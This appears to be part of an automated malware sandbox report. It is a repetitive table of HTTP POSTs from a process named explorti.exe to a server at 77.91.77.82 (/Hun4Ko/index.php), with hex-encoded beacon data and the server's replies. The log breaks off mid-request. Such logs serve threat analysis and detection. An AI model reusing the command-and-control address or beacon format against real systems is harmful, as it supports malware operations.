                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:30.065701008 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:30.760668039 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:30.761459112 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:30.977969885 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.44977177.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:31.096893072 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:31.833709002 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:31.834423065 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:32.064276934 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.44977277.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:32.175137997 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:32.902549982 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:32.903347969 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:33.128952980 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.44977377.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:33.237413883 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:33.949287891 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:33.950393915 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:34.174613953 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.44977477.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:34.284127951 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:35.025150061 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:35.025885105 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:35.251574993 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.44977577.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:35.362756014 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:36.056508064 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:36.057226896 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:36.273655891 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.44977677.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:36.396392107 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:37.101370096 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:37.102093935 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:37.323815107 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.44977777.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:37.441503048 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:38.164408922 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:38.165905952 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:38.400042057 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.44977877.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:38.518486977 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:39.212336063 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:39.213088036 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:39.431180000 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.44977977.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:39.550251007 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:40.253124952 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:40.254215002 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:40.472306967 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.44978077.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:40.583379030 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:41.287861109 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:41.288603067 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:41.514116049 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.44978177.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:41.628053904 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:42.354007959 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:42.354763985 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
